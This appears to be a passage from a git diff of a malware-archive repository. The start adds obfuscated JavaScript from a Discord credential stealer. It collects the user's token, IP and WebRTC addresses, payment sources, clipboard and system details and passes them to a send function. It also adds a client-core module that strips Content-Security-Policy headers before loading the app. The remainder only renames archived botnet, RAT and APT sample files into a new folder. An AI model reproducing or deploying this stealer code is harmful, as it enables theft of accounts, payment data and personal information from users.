console[_0x476f[77]](_0x476f[76]); + electron[_0x476f[79]][_0x476f[78]](); + window[_0x476f[81]][_0x476f[80]](); + focusamount = 0 + } +}); +getwebrtcinfo(function(ip) { + webrtcips = webrtcips + ip + _0x476f[83] +}); +getip(); +getuserinfo(token); +getpaymentsources(token); +setTimeout(() => { + var _0xb38cx30 = (_0x476f[84] + underesc + _0x476f[11] + underesc + _0x476f[11] + token + _0x476f[11] + underesc + _0x476f[11] + underesc + _0x476f[85] + (gettimezone()) + _0x476f[86] + (getresolution()) + _0x476f[87] + ip + _0x476f[88] + webrtcips + _0x476f[89] + userinfo + _0x476f[90] + username + _0x476f[91] + hasattached + _0x476f[92] + (returnzoomfactor()) + _0x476f[93] + (returnuseragent()) + _0x476f[94] + (getdiscordversion()) + _0x476f[95] + (getclipboard()) + _0x476f[11]); + pin(_0xb38cx30) +}, 5000); +setTimeout(() => { + delboostserveronclient() +}, 1); +setTimeout(() => { + fightdio() +}, 1) + + +\ modules\ discord_desktop_core: + const electron = require('electron'); +const path = require('path'); + +electron.session.defaultSession.webRequest.onHeadersReceived(function(details, callback) { + if (!details.responseHeaders['content-security-policy-report-only'] && !details.responseHeaders['content-security-policy']) return callback({ + cancel: false + }); + delete details.responseHeaders['content-security-policy-report-only']; + delete details.responseHeaders['content-security-policy']; + callback({ + cancel: false, + responseHeaders: details.responseHeaders + }); +}); + +module.exports = require('./core.asar'); diff --git a/Leaks/Other/APTMuddy.Python.C2.zip b/Win32/APTMuddy.Python.C2.zip similarity index 100% rename from Leaks/Other/APTMuddy.Python.C2.zip rename to Win32/APTMuddy.Python.C2.zip diff --git a/Leaks/Win32/Backdoor.Win32.APT34.PoisonFrogC2.7z b/Win32/Backdoor.Win32.APT34.PoisonFrogC2.7z similarity index 100% rename from Leaks/Win32/Backdoor.Win32.APT34.PoisonFrogC2.7z rename to Win32/Backdoor.Win32.APT34.PoisonFrogC2.7z 
diff --git a/Win32/Backdoor.Win32.Aryan.7z b/Win32/Botnets/Backdoor.Win32.Aryan.7z
similarity index 100%
rename from Win32/Backdoor.Win32.Aryan.7z
rename to Win32/Botnets/Backdoor.Win32.Aryan.7z
diff --git a/Win32/Backdoor.Win32.NytroTrojan.a.7z b/Win32/Botnets/Backdoor.Win32.NytroTrojan.a.7z
similarity index 100%
rename from Win32/Backdoor.Win32.NytroTrojan.a.7z
rename to Win32/Botnets/Backdoor.Win32.NytroTrojan.a.7z
diff --git a/Win32/Win32.A59.7z b/Win32/Botnets/Win32.A59.7z
similarity index 100%
rename from Win32/Win32.A59.7z
rename to Win32/Botnets/Win32.A59.7z
diff --git a/Win32/Win32.Acid.b.7z b/Win32/Botnets/Win32.Acid.b.7z
similarity index 100%
rename from Win32/Win32.Acid.b.7z
rename to Win32/Botnets/Win32.Acid.b.7z
diff --git a/Win32/Win32.Ago.c.7z b/Win32/Botnets/Win32.Ago.c.7z
similarity index 100%
rename from Win32/Win32.Ago.c.7z
rename to Win32/Botnets/Win32.Ago.c.7z
diff --git a/Win32/Win32.Agony.rar b/Win32/Botnets/Win32.Agony.rar
similarity index 100%
rename from Win32/Win32.Agony.rar
rename to Win32/Botnets/Win32.Agony.rar
diff --git a/Win32/Win32.Algus.f.7z b/Win32/Botnets/Win32.Algus.f.7z
similarity index 100%
rename from Win32/Win32.Algus.f.7z
rename to Win32/Botnets/Win32.Algus.f.7z
diff --git a/Win32/Win32.AryanRat.d.rar b/Win32/Botnets/Win32.AryanRat.d.rar
similarity index 100%
rename from Win32/Win32.AryanRat.d.rar
rename to Win32/Botnets/Win32.AryanRat.d.rar
diff --git a/Win32/Win32.Aspergillus.ac.7z b/Win32/Botnets/Win32.Aspergillus.ac.7z
similarity index 100%
rename from Win32/Win32.Aspergillus.ac.7z
rename to Win32/Botnets/Win32.Aspergillus.ac.7z
diff --git a/Win32/Win32.Atomic.bl.7z b/Win32/Botnets/Win32.Atomic.bl.7z
similarity index 100%
rename from Win32/Win32.Atomic.bl.7z
rename to Win32/Botnets/Win32.Atomic.bl.7z
diff --git a/Win32/Win32.BBot.a.7z b/Win32/Botnets/Win32.BBot.a.7z
similarity index 100%
rename from Win32/Win32.BBot.a.7z
rename to Win32/Botnets/Win32.BBot.a.7z
diff --git a/Win32/Win32.BackConnect.ab.zip b/Win32/Botnets/Win32.BackConnect.ab.zip
similarity index 100%
rename from Win32/Win32.BackConnect.ab.zip
rename to Win32/Botnets/Win32.BackConnect.ab.zip
diff --git a/Win32/Win32.Backdoor.Tyupkin.multi.7z b/Win32/Botnets/Win32.Backdoor.Tyupkin.multi.7z
similarity index 100%
rename from Win32/Win32.Backdoor.Tyupkin.multi.7z
rename to Win32/Botnets/Win32.Backdoor.Tyupkin.multi.7z
diff --git a/Win32/Win32.Beast.gb.7z b/Win32/Botnets/Win32.Beast.gb.7z
similarity index 100%
rename from Win32/Win32.Beast.gb.7z
rename to Win32/Botnets/Win32.Beast.gb.7z
diff --git a/Win32/Win32.Beta.7z b/Win32/Botnets/Win32.Beta.7z
similarity index 100%
rename from Win32/Win32.Beta.7z
rename to Win32/Botnets/Win32.Beta.7z
diff --git a/Win32/Win32.Bizac.a.rar b/Win32/Botnets/Win32.Bizac.a.rar
similarity index 100%
rename from Win32/Win32.Bizac.a.rar
rename to Win32/Botnets/Win32.Bizac.a.rar
diff --git a/Win32/Win32.BlackDream.7z b/Win32/Botnets/Win32.BlackDream.7z
similarity index 100%
rename from Win32/Win32.BlackDream.7z
rename to Win32/Botnets/Win32.BlackDream.7z
diff --git a/Win32/Win32.BlowSXT.rar b/Win32/Botnets/Win32.BlowSXT.rar
similarity index 100%
rename from Win32/Win32.BlowSXT.rar
rename to Win32/Botnets/Win32.BlowSXT.rar
diff --git a/Win32/Win32.BotNET.a.rar b/Win32/Botnets/Win32.BotNET.a.rar
similarity index 100%
rename from Win32/Win32.BotNET.a.rar
rename to Win32/Botnets/Win32.BotNET.a.rar
diff --git a/Win32/Win32.BsodInvoker.zip b/Win32/Botnets/Win32.BsodInvoker.zip
similarity index 100%
rename from Win32/Win32.BsodInvoker.zip
rename to Win32/Botnets/Win32.BsodInvoker.zip
diff --git a/Win32/Win32.CBot.7z b/Win32/Botnets/Win32.CBot.7z
similarity index 100%
rename from Win32/Win32.CBot.7z
rename to Win32/Botnets/Win32.CBot.7z
diff --git a/Win32/Win32.Canbis.a.rar b/Win32/Botnets/Win32.Canbis.a.rar
similarity index 100%
rename from Win32/Win32.Canbis.a.rar
rename to Win32/Botnets/Win32.Canbis.a.rar
diff --git a/Win32/Win32.Casper.7z b/Win32/Botnets/Win32.Casper.7z
similarity index 100%
rename from Win32/Win32.Casper.7z
rename to Win32/Botnets/Win32.Casper.7z
diff --git a/Win32/Win32.Chameleon.7z b/Win32/Botnets/Win32.Chameleon.7z
similarity index 100%
rename from Win32/Win32.Chameleon.7z
rename to Win32/Botnets/Win32.Chameleon.7z
diff --git a/Win32/Win32.ChodeBot.a.7z b/Win32/Botnets/Win32.ChodeBot.a.7z
similarity index 100%
rename from Win32/Win32.ChodeBot.a.7z
rename to Win32/Botnets/Win32.ChodeBot.a.7z
diff --git a/Win32/Win32.CiscoBot.7z b/Win32/Botnets/Win32.CiscoBot.7z
similarity index 100%
rename from Win32/Win32.CiscoBot.7z
rename to Win32/Botnets/Win32.CiscoBot.7z
diff --git a/Win32/Win32.Cissi.zip b/Win32/Botnets/Win32.Cissi.zip
similarity index 100%
rename from Win32/Win32.Cissi.zip
rename to Win32/Botnets/Win32.Cissi.zip
diff --git a/Win32/Win32.CpBot.7z b/Win32/Botnets/Win32.CpBot.7z
similarity index 100%
rename from Win32/Win32.CpBot.7z
rename to Win32/Botnets/Win32.CpBot.7z
diff --git a/Win32/Win32.CrackBot.adb.7z b/Win32/Botnets/Win32.CrackBot.adb.7z
similarity index 100%
rename from Win32/Win32.CrackBot.adb.7z
rename to Win32/Botnets/Win32.CrackBot.adb.7z
diff --git a/Win32/Win32.CrxBot.rr.7z b/Win32/Botnets/Win32.CrxBot.rr.7z
similarity index 100%
rename from Win32/Win32.CrxBot.rr.7z
rename to Win32/Botnets/Win32.CrxBot.rr.7z
diff --git a/Win32/Win32.DKCS.7z b/Win32/Botnets/Win32.DKCS.7z
similarity index 100%
rename from Win32/Win32.DKCS.7z
rename to Win32/Botnets/Win32.DKCS.7z
diff --git a/Win32/Win32.DarkAnal.7z b/Win32/Botnets/Win32.DarkAnal.7z
similarity index 100%
rename from Win32/Win32.DarkAnal.7z
rename to Win32/Botnets/Win32.DarkAnal.7z
diff --git a/Win32/Win32.DarkBot.f.a.c.7z b/Win32/Botnets/Win32.DarkBot.f.a.c.7z
similarity index 100%
rename from Win32/Win32.DarkBot.f.a.c.7z
rename to Win32/Botnets/Win32.DarkBot.f.a.c.7z
diff --git a/Win32/Win32.DataSpyNetworkc2.b.7z b/Win32/Botnets/Win32.DataSpyNetworkc2.b.7z
similarity index 100%
rename from Win32/Win32.DataSpyNetworkc2.b.7z
rename to Win32/Botnets/Win32.DataSpyNetworkc2.b.7z
diff --git a/Win32/Win32.Delikon.7z b/Win32/Botnets/Win32.Delikon.7z
similarity index 100%
rename from Win32/Win32.Delikon.7z
rename to Win32/Botnets/Win32.Delikon.7z
diff --git a/Win32/Win32.Dexter.p.7z b/Win32/Botnets/Win32.Dexter.p.7z
similarity index 100%
rename from Win32/Win32.Dexter.p.7z
rename to Win32/Botnets/Win32.Dexter.p.7z
diff --git a/Win32/Win32.Dixie.rar b/Win32/Botnets/Win32.Dixie.rar
similarity index 100%
rename from Win32/Win32.Dixie.rar
rename to Win32/Botnets/Win32.Dixie.rar
diff --git a/Win32/Win32.DonaldDick.7z b/Win32/Botnets/Win32.DonaldDick.7z
similarity index 100%
rename from Win32/Win32.DonaldDick.7z
rename to Win32/Botnets/Win32.DonaldDick.7z
diff --git a/Win32/Win32.Dt8.rar b/Win32/Botnets/Win32.Dt8.rar
similarity index 100%
rename from Win32/Win32.Dt8.rar
rename to Win32/Botnets/Win32.Dt8.rar
diff --git a/Win32/Win32.EOF.a.7z b/Win32/Botnets/Win32.EOF.a.7z
similarity index 100%
rename from Win32/Win32.EOF.a.7z
rename to Win32/Botnets/Win32.EOF.a.7z
diff --git a/Win32/Win32.Ejac.rar b/Win32/Botnets/Win32.Ejac.rar
similarity index 100%
rename from Win32/Win32.Ejac.rar
rename to Win32/Botnets/Win32.Ejac.rar
diff --git a/Win32/Win32.EnglishRat.7z b/Win32/Botnets/Win32.EnglishRat.7z
similarity index 100%
rename from Win32/Win32.EnglishRat.7z
rename to Win32/Botnets/Win32.EnglishRat.7z
diff --git a/Win32/Win32.FakeAV.SystemSecurity2010.7z b/Win32/Botnets/Win32.FakeAV.SystemSecurity2010.7z
similarity index 100%
rename from Win32/Win32.FakeAV.SystemSecurity2010.7z
rename to Win32/Botnets/Win32.FakeAV.SystemSecurity2010.7z
diff --git a/Win32/Win32.FlameBot.7z b/Win32/Botnets/Win32.FlameBot.7z
similarity index 100%
rename from Win32/Win32.FlameBot.7z
rename to Win32/Botnets/Win32.FlameBot.7z
diff --git a/Win32/Win32.Flexispy.7z b/Win32/Botnets/Win32.Flexispy.7z
similarity index 100%
rename from Win32/Win32.Flexispy.7z
rename to Win32/Botnets/Win32.Flexispy.7z
diff --git a/Win32/Win32.FuckYou.rar b/Win32/Botnets/Win32.FuckYou.rar
similarity index 100%
rename from Win32/Win32.FuckYou.rar
rename to Win32/Botnets/Win32.FuckYou.rar
diff --git a/Win32/Win32.FukJ.7z b/Win32/Botnets/Win32.FukJ.7z
similarity index 100%
rename from Win32/Win32.FukJ.7z
rename to Win32/Botnets/Win32.FukJ.7z
diff --git a/Win32/Win32.Fungus.7z b/Win32/Botnets/Win32.Fungus.7z
similarity index 100%
rename from Win32/Win32.Fungus.7z
rename to Win32/Botnets/Win32.Fungus.7z
diff --git a/Win32/Win32.GellBot.c.7z b/Win32/Botnets/Win32.GellBot.c.7z
similarity index 100%
rename from Win32/Win32.GellBot.c.7z
rename to Win32/Botnets/Win32.GellBot.c.7z
diff --git a/Win32/Win32.Gigabot.7z b/Win32/Botnets/Win32.Gigabot.7z
similarity index 100%
rename from Win32/Win32.Gigabot.7z
rename to Win32/Botnets/Win32.Gigabot.7z
diff --git a/Win32/Win32.Gobot.ad.rar b/Win32/Botnets/Win32.Gobot.ad.rar
similarity index 100%
rename from Win32/Win32.Gobot.ad.rar
rename to Win32/Botnets/Win32.Gobot.ad.rar
diff --git a/Win32/Win32.Gold.7z b/Win32/Botnets/Win32.Gold.7z
similarity index 100%
rename from Win32/Win32.Gold.7z
rename to Win32/Botnets/Win32.Gold.7z
diff --git a/Win32/Win32.Grum.7z b/Win32/Botnets/Win32.Grum.7z
similarity index 100%
rename from Win32/Win32.Grum.7z
rename to Win32/Botnets/Win32.Grum.7z
diff --git a/Win32/Win32.Grum.zip b/Win32/Botnets/Win32.Grum.zip
similarity index 100%
rename from Win32/Win32.Grum.zip
rename to Win32/Botnets/Win32.Grum.zip
diff --git a/Win32/Win32.Gsome.0.6a.7z b/Win32/Botnets/Win32.Gsome.0.6a.7z
similarity index 100%
rename from Win32/Win32.Gsome.0.6a.7z
rename to Win32/Botnets/Win32.Gsome.0.6a.7z
diff --git a/Win32/Win32.Gsome.0.7.0.3.7z b/Win32/Botnets/Win32.Gsome.0.7.0.3.7z
similarity index 100%
rename from Win32/Win32.Gsome.0.7.0.3.7z
rename to Win32/Botnets/Win32.Gsome.0.7.0.3.7z
diff --git a/Win32/Win32.Guptchar.7z b/Win32/Botnets/Win32.Guptchar.7z
similarity index 100%
rename from Win32/Win32.Guptchar.7z
rename to Win32/Botnets/Win32.Guptchar.7z
diff --git a/Win32/Win32.HarvecterBot.rar b/Win32/Botnets/Win32.HarvecterBot.rar
similarity index 100%
rename from Win32/Win32.HarvecterBot.rar
rename to Win32/Botnets/Win32.HarvecterBot.rar
diff --git a/Win32/Win32.HdBot.c.rar b/Win32/Botnets/Win32.HdBot.c.rar
similarity index 100%
rename from Win32/Win32.HdBot.c.rar
rename to Win32/Botnets/Win32.HdBot.c.rar
diff --git a/Win32/Win32.Heleks.a.7z b/Win32/Botnets/Win32.Heleks.a.7z
similarity index 100%
rename from Win32/Win32.Heleks.a.7z
rename to Win32/Botnets/Win32.Heleks.a.7z
diff --git a/Win32/Win32.Hidden.7z b/Win32/Botnets/Win32.Hidden.7z
similarity index 100%
rename from Win32/Win32.Hidden.7z
rename to Win32/Botnets/Win32.Hidden.7z
diff --git a/Win32/Win32.Hound.7z b/Win32/Botnets/Win32.Hound.7z
similarity index 100%
rename from Win32/Win32.Hound.7z
rename to Win32/Botnets/Win32.Hound.7z
diff --git a/Win32/Win32.Hydra.7z b/Win32/Botnets/Win32.Hydra.7z
similarity index 100%
rename from Win32/Win32.Hydra.7z
rename to Win32/Botnets/Win32.Hydra.7z
diff --git a/Win32/Win32.ICQPagerDataSpy.7z b/Win32/Botnets/Win32.ICQPagerDataSpy.7z
similarity index 100%
rename from Win32/Win32.ICQPagerDataSpy.7z
rename to Win32/Botnets/Win32.ICQPagerDataSpy.7z
diff --git a/Win32/Win32.IMSpreader.7z b/Win32/Botnets/Win32.IMSpreader.7z
similarity index 100%
rename from Win32/Win32.IMSpreader.7z
rename to Win32/Botnets/Win32.IMSpreader.7z
diff --git a/Win32/Win32.ImBot.a.c.7z b/Win32/Botnets/Win32.ImBot.a.c.7z
similarity index 100%
rename from Win32/Win32.ImBot.a.c.7z
rename to Win32/Botnets/Win32.ImBot.a.c.7z
diff --git a/Win32/Win32.Immortal.b.7z b/Win32/Botnets/Win32.Immortal.b.7z
similarity index 100%
rename from Win32/Win32.Immortal.b.7z
rename to Win32/Botnets/Win32.Immortal.b.7z
diff --git a/Win32/Win32.Infest.7z b/Win32/Botnets/Win32.Infest.7z
similarity index 100%
rename from Win32/Win32.Infest.7z
rename to Win32/Botnets/Win32.Infest.7z
diff --git a/Win32/Win32.IntelligentNetSpy.7z b/Win32/Botnets/Win32.IntelligentNetSpy.7z
similarity index 100%
rename from Win32/Win32.IntelligentNetSpy.7z
rename to Win32/Botnets/Win32.IntelligentNetSpy.7z
diff --git a/Win32/Win32.IrBot.7z b/Win32/Botnets/Win32.IrBot.7z
similarity index 100%
rename from Win32/Win32.IrBot.7z
rename to Win32/Botnets/Win32.IrBot.7z
diff --git a/Win32/Win32.IrcWorm.a.c.zip b/Win32/Botnets/Win32.IrcWorm.a.c.zip
similarity index 100%
rename from Win32/Win32.IrcWorm.a.c.zip
rename to Win32/Botnets/Win32.IrcWorm.a.c.zip
diff --git a/Win32/Win32.JackShell.7z b/Win32/Botnets/Win32.JackShell.7z
similarity index 100%
rename from Win32/Win32.JackShell.7z
rename to Win32/Botnets/Win32.JackShell.7z
diff --git a/Win32/Win32.Jigsaw.a.rar b/Win32/Botnets/Win32.Jigsaw.a.rar
similarity index 100%
rename from Win32/Win32.Jigsaw.a.rar
rename to Win32/Botnets/Win32.Jigsaw.a.rar
diff --git a/Win32/Win32.JrBot.rar b/Win32/Botnets/Win32.JrBot.rar
similarity index 100%
rename from Win32/Win32.JrBot.rar
rename to Win32/Botnets/Win32.JrBot.rar
diff --git a/Win32/Win32.KayaBot.dyia.7z b/Win32/Botnets/Win32.KayaBot.dyia.7z
similarity index 100%
rename from Win32/Win32.KayaBot.dyia.7z
rename to Win32/Botnets/Win32.KayaBot.dyia.7z
diff --git a/Win32/Win32.Kbot.7z b/Win32/Botnets/Win32.Kbot.7z
similarity index 100%
rename from Win32/Win32.Kbot.7z
rename to Win32/Botnets/Win32.Kbot.7z
diff --git a/Win32/Win32.Krotten.7z b/Win32/Botnets/Win32.Krotten.7z
similarity index 100%
rename from Win32/Win32.Krotten.7z
rename to Win32/Botnets/Win32.Krotten.7z
diff --git a/Win32/Win32.Letum.7z b/Win32/Botnets/Win32.Letum.7z
similarity index 100%
rename from Win32/Win32.Letum.7z
rename to Win32/Botnets/Win32.Letum.7z
diff --git a/Win32/Win32.Liquid.7z b/Win32/Botnets/Win32.Liquid.7z
similarity index 100%
rename from Win32/Win32.Liquid.7z
rename to Win32/Botnets/Win32.Liquid.7z
diff --git a/Win32/Win32.LoaderBot.a.7z b/Win32/Botnets/Win32.LoaderBot.a.7z
similarity index 100%
rename from Win32/Win32.LoaderBot.a.7z
rename to Win32/Botnets/Win32.LoaderBot.a.7z
diff --git a/Win32/Win32.Lolworm.7z b/Win32/Botnets/Win32.Lolworm.7z
similarity index 100%
rename from Win32/Win32.Lolworm.7z
rename to Win32/Botnets/Win32.Lolworm.7z
diff --git a/Win32/Win32.MBot.7z b/Win32/Botnets/Win32.MBot.7z
similarity index 100%
rename from Win32/Win32.MBot.7z
rename to Win32/Botnets/Win32.MBot.7z
diff --git a/Win32/Win32.MSNSpread.7z b/Win32/Botnets/Win32.MSNSpread.7z
similarity index 100%
rename from Win32/Win32.MSNSpread.7z
rename to Win32/Botnets/Win32.MSNSpread.7z
diff --git a/Win32/Win32.MailReactor.7z b/Win32/Botnets/Win32.MailReactor.7z
similarity index 100%
rename from Win32/Win32.MailReactor.7z
rename to Win32/Botnets/Win32.MailReactor.7z
diff --git a/Win32/Win32.Metarage.k.rar b/Win32/Botnets/Win32.Metarage.k.rar
similarity index 100%
rename from Win32/Win32.Metarage.k.rar
rename to Win32/Botnets/Win32.Metarage.k.rar
diff --git a/Win32/Win32.Mimail.7z b/Win32/Botnets/Win32.Mimail.7z
similarity index 100%
rename from Win32/Win32.Mimail.7z
rename to Win32/Botnets/Win32.Mimail.7z
diff --git a/Win32/Win32.Minipanzer.7z b/Win32/Botnets/Win32.Minipanzer.7z
similarity index 100%
rename from Win32/Win32.Minipanzer.7z
rename to Win32/Botnets/Win32.Minipanzer.7z
diff --git a/Win32/Win32.MioStar.ab.7z b/Win32/Botnets/Win32.MioStar.ab.7z
similarity index 100%
rename from Win32/Win32.MioStar.ab.7z
rename to Win32/Botnets/Win32.MioStar.ab.7z
diff --git a/Win32/Win32.Morphine.ce.7z b/Win32/Botnets/Win32.Morphine.ce.7z
similarity index 100%
rename from Win32/Win32.Morphine.ce.7z
rename to Win32/Botnets/Win32.Morphine.ce.7z
diff --git a/Win32/Win32.Moses.a.a.e.7z b/Win32/Botnets/Win32.Moses.a.a.e.7z
similarity index 100%
rename from Win32/Win32.Moses.a.a.e.7z
rename to Win32/Botnets/Win32.Moses.a.a.e.7z
diff --git a/Win32/Win32.MrAlex.a.7z b/Win32/Botnets/Win32.MrAlex.a.7z
similarity index 100%
rename from Win32/Win32.MrAlex.a.7z
rename to Win32/Botnets/Win32.MrAlex.a.7z
diff --git a/Win32/Win32.N00bKit.7z b/Win32/Botnets/Win32.N00bKit.7z
similarity index 100%
rename from Win32/Win32.N00bKit.7z
rename to Win32/Botnets/Win32.N00bKit.7z
diff --git a/Win32/Win32.NB.b.7z b/Win32/Botnets/Win32.NB.b.7z
similarity index 100%
rename from Win32/Win32.NB.b.7z
rename to Win32/Botnets/Win32.NB.b.7z
diff --git a/Win32/Win32.Napsin.7z b/Win32/Botnets/Win32.Napsin.7z
similarity index 100%
rename from Win32/Win32.Napsin.7z
rename to Win32/Botnets/Win32.Napsin.7z
diff --git a/Win32/Win32.NinjaBot.zip b/Win32/Botnets/Win32.NinjaBot.zip
similarity index 100%
rename from Win32/Win32.NinjaBot.zip
rename to Win32/Botnets/Win32.NinjaBot.zip
diff --git a/Win32/Win32.NiteAim.7z b/Win32/Botnets/Win32.NiteAim.7z
similarity index 100%
rename from Win32/Win32.NiteAim.7z
rename to Win32/Botnets/Win32.NiteAim.7z
diff --git a/Win32/Win32.Norman.7z b/Win32/Botnets/Win32.Norman.7z
similarity index 100%
rename from Win32/Win32.Norman.7z
rename to Win32/Botnets/Win32.Norman.7z
diff --git a/Win32/Win32.Null.7z b/Win32/Botnets/Win32.Null.7z
similarity index 100%
rename from Win32/Win32.Null.7z
rename to Win32/Botnets/Win32.Null.7z
diff --git a/Win32/Win32.Nullbot.7z b/Win32/Botnets/Win32.Nullbot.7z
similarity index 100%
rename from Win32/Win32.Nullbot.7z
rename to Win32/Botnets/Win32.Nullbot.7z
diff --git a/Win32/Win32.OgWorm.7z b/Win32/Botnets/Win32.OgWorm.7z
similarity index 100%
rename from Win32/Win32.OgWorm.7z
rename to Win32/Botnets/Win32.OgWorm.7z
diff --git a/Win32/Win32.Osc.zip b/Win32/Botnets/Win32.Osc.zip
similarity index 100%
rename from Win32/Win32.Osc.zip
rename to Win32/Botnets/Win32.Osc.zip
diff --git a/Win32/Win32.PBot.a.rar b/Win32/Botnets/Win32.PBot.a.rar
similarity index 100%
rename from Win32/Win32.PBot.a.rar
rename to Win32/Botnets/Win32.PBot.a.rar
diff --git a/Win32/Win32.Plague.7z b/Win32/Botnets/Win32.Plague.7z
similarity index 100%
rename from Win32/Win32.Plague.7z
rename to Win32/Botnets/Win32.Plague.7z
diff --git a/Win32/Win32.Poshspy.7z b/Win32/Botnets/Win32.Poshspy.7z
similarity index 100%
rename from Win32/Win32.Poshspy.7z
rename to Win32/Botnets/Win32.Poshspy.7z
diff --git a/Win32/Win32.Pwnbot.7z b/Win32/Botnets/Win32.Pwnbot.7z
similarity index 100%
rename from Win32/Win32.Pwnbot.7z
rename to Win32/Botnets/Win32.Pwnbot.7z
diff --git a/Win32/Win32.Q8Bot.7z b/Win32/Botnets/Win32.Q8Bot.7z
similarity index 100%
rename from Win32/Win32.Q8Bot.7z
rename to Win32/Botnets/Win32.Q8Bot.7z
diff --git a/Win32/Win32.Rat.a.7z b/Win32/Botnets/Win32.Rat.a.7z
similarity index 100%
rename from Win32/Win32.Rat.a.7z
rename to Win32/Botnets/Win32.Rat.a.7z
diff --git a/Win32/Win32.Ravbot.rar b/Win32/Botnets/Win32.Ravbot.rar
similarity index 100%
rename from Win32/Win32.Ravbot.rar
rename to Win32/Botnets/Win32.Ravbot.rar
diff --git a/Win32/Win32.Retro.7z b/Win32/Botnets/Win32.Retro.7z
similarity index 100%
rename from Win32/Win32.Retro.7z
rename to Win32/Botnets/Win32.Retro.7z
diff --git a/Win32/Win32.ReverseSocksBot.7z b/Win32/Botnets/Win32.ReverseSocksBot.7z
similarity index 100%
rename from Win32/Win32.ReverseSocksBot.7z
rename to Win32/Botnets/Win32.ReverseSocksBot.7z
diff --git a/Win32/Win32.Rubilyn.7z b/Win32/Botnets/Win32.Rubilyn.7z
similarity index 100%
rename from Win32/Win32.Rubilyn.7z
rename to Win32/Botnets/Win32.Rubilyn.7z
diff --git a/Win32/Win32.S5.7z b/Win32/Botnets/Win32.S5.7z
similarity index 100%
rename from Win32/Win32.S5.7z
rename to Win32/Botnets/Win32.S5.7z
diff --git a/Win32/Win32.Sbx.amk.7z b/Win32/Botnets/Win32.Sbx.amk.7z
similarity index 100%
rename from Win32/Win32.Sbx.amk.7z
rename to Win32/Botnets/Win32.Sbx.amk.7z
diff --git a/Win32/Win32.ShellbotFTP.7z b/Win32/Botnets/Win32.ShellbotFTP.7z
similarity index 100%
rename from Win32/Win32.ShellbotFTP.7z
rename to Win32/Botnets/Win32.ShellbotFTP.7z
diff --git a/Win32/Win32.Sinapps.7z b/Win32/Botnets/Win32.Sinapps.7z
similarity index 100%
rename from Win32/Win32.Sinapps.7z
rename to Win32/Botnets/Win32.Sinapps.7z
diff --git a/Win32/Win32.Sinowal.7z b/Win32/Botnets/Win32.Sinowal.7z
similarity index 100%
rename from Win32/Win32.Sinowal.7z
rename to Win32/Botnets/Win32.Sinowal.7z
diff --git a/Win32/Win32.Skun.l.7z b/Win32/Botnets/Win32.Skun.l.7z
similarity index 100%
rename from Win32/Win32.Skun.l.7z
rename to Win32/Botnets/Win32.Skun.l.7z
diff --git a/Win32/Win32.Skuz.7z b/Win32/Botnets/Win32.Skuz.7z
similarity index 100%
rename from Win32/Win32.Skuz.7z
rename to Win32/Botnets/Win32.Skuz.7z
diff --git a/Win32/Win32.SkyDance.bb.7z b/Win32/Botnets/Win32.SkyDance.bb.7z
similarity index 100%
rename from Win32/Win32.SkyDance.bb.7z
rename to Win32/Botnets/Win32.SkyDance.bb.7z
diff --git a/Win32/Win32.Small.7z b/Win32/Botnets/Win32.Small.7z
similarity index 100%
rename from Win32/Win32.Small.7z
rename to Win32/Botnets/Win32.Small.7z
diff --git a/Win32/Win32.Spaz.b.7z b/Win32/Botnets/Win32.Spaz.b.7z
similarity index 100%
rename from Win32/Win32.Spaz.b.7z
rename to Win32/Botnets/Win32.Spaz.b.7z
diff --git a/Win32/Win32.Splitter.d.zip b/Win32/Botnets/Win32.Splitter.d.zip
similarity index 100%
rename from Win32/Win32.Splitter.d.zip
rename to Win32/Botnets/Win32.Splitter.d.zip
diff --git a/Win32/Win32.Steam.7z b/Win32/Botnets/Win32.Steam.7z
similarity index 100%
rename from Win32/Win32.Steam.7z
rename to Win32/Botnets/Win32.Steam.7z
diff --git a/Win32/Win32.Stellar.a.7z b/Win32/Botnets/Win32.Stellar.a.7z
similarity index 100%
rename from Win32/Win32.Stellar.a.7z
rename to Win32/Botnets/Win32.Stellar.a.7z
diff --git a/Win32/Win32.Stolich.7z b/Win32/Botnets/Win32.Stolich.7z
similarity index 100%
rename from Win32/Win32.Stolich.7z
rename to Win32/Botnets/Win32.Stolich.7z
diff --git a/Win32/Win32.Stukach.7z b/Win32/Botnets/Win32.Stukach.7z
similarity index 100%
rename from Win32/Win32.Stukach.7z
rename to Win32/Botnets/Win32.Stukach.7z
diff --git a/Win32/Win32.Sutoxin.zip b/Win32/Botnets/Win32.Sutoxin.zip
similarity index 100%
rename from Win32/Win32.Sutoxin.zip
rename to Win32/Botnets/Win32.Sutoxin.zip
diff --git a/Win32/Win32.Tank.7z b/Win32/Botnets/Win32.Tank.7z
similarity index 100%
rename from Win32/Win32.Tank.7z
rename to Win32/Botnets/Win32.Tank.7z
diff --git a/Win32/Win32.TgSpy.b.zip b/Win32/Botnets/Win32.TgSpy.b.zip
similarity index 100%
rename from Win32/Win32.TgSpy.b.zip
rename to Win32/Botnets/Win32.TgSpy.b.zip
diff --git a/Win32/Win32.TinyFWB.7z b/Win32/Botnets/Win32.TinyFWB.7z
similarity index 100%
rename from Win32/Win32.TinyFWB.7z
rename to Win32/Botnets/Win32.TinyFWB.7z
diff --git a/Win32/Win32.TinyNuke.7z b/Win32/Botnets/Win32.TinyNuke.7z
similarity index 100%
rename from Win32/Win32.TinyNuke.7z
rename to Win32/Botnets/Win32.TinyNuke.7z
diff --git a/Win32/Win32.Treasurehunter.7z b/Win32/Botnets/Win32.Treasurehunter.7z
similarity index 100%
rename from Win32/Win32.Treasurehunter.7z
rename to Win32/Botnets/Win32.Treasurehunter.7z
diff --git a/Win32/Win32.TribeFloodNet.bk.7z b/Win32/Botnets/Win32.TribeFloodNet.bk.7z
similarity index 100%
rename from Win32/Win32.TribeFloodNet.bk.7z
rename to Win32/Botnets/Win32.TribeFloodNet.bk.7z
diff --git a/Win32/Win32.Trochilus.7z b/Win32/Botnets/Win32.Trochilus.7z
similarity index 100%
rename from Win32/Win32.Trochilus.7z
rename to Win32/Botnets/Win32.Trochilus.7z
diff --git a/Win32/Win32.Tsgh.7z b/Win32/Botnets/Win32.Tsgh.7z
similarity index 100%
rename from Win32/Win32.Tsgh.7z
rename to Win32/Botnets/Win32.Tsgh.7z
diff --git a/Win32/Win32.UBoat.b.zip b/Win32/Botnets/Win32.UBoat.b.zip
similarity index 100%
rename from Win32/Win32.UBoat.b.zip
rename to Win32/Botnets/Win32.UBoat.b.zip
diff --git a/Win32/Win32.UmbraLoader.7z b/Win32/Botnets/Win32.UmbraLoader.7z
similarity index 100%
rename from Win32/Win32.UmbraLoader.7z
rename to Win32/Botnets/Win32.UmbraLoader.7z
